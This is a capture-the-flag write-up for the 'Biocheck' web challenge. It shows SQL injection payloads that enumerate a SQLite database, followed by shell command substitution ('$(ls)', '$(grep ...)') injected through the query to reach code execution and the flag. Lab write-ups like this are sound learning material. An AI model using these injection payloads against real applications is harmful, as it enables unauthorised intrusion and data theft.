Biocheck

Description

Biocheck [Web]

ARIA has started making simple applications to display their intelligence, but they're still in a rough state. Break in, and discover the critical information!

https://uscybercombine-s4-biocheck.chals.io/

Solution

We can query information about Historical figures, but we are limited to few people

Bio Check

If we inject quote (') we get 500 error, meaning there's probably SQL query used

Check if SQLite3: Albert Einstein' UNION SELECT sqlite_version(); -- -

PayloadsAllTheThings/SQL Injection/SQLite Injection.md

' UNION SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%
> figures

' UNION SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='figures
> CREATE TABLE figures (
	id INTEGER PRIMARY KEY,
	name TEXT NOT NULL,
	bio TEXT NOT NULL
)

The database only holds figure records and that's it.

I was testing for SSTI since it's a Python server, but was going nowhere. Then I tried${{7*7}}

and the app crashed (added dollar), why? I think the only programming language that treats dollars as special characters is PHP or Bash, we are on Python server so that leaves Bash. Trying $0 shell variable we get runner program name:

Payload: '; SELECT '$(ls)'; -- -

Payload: ' UNION SELECT '$(grep "SIVBGR" . -Rain)' -- -

Bio Check-5

Flag: SIVBGR{H1st0ry_1s_1mp0rt4nt!}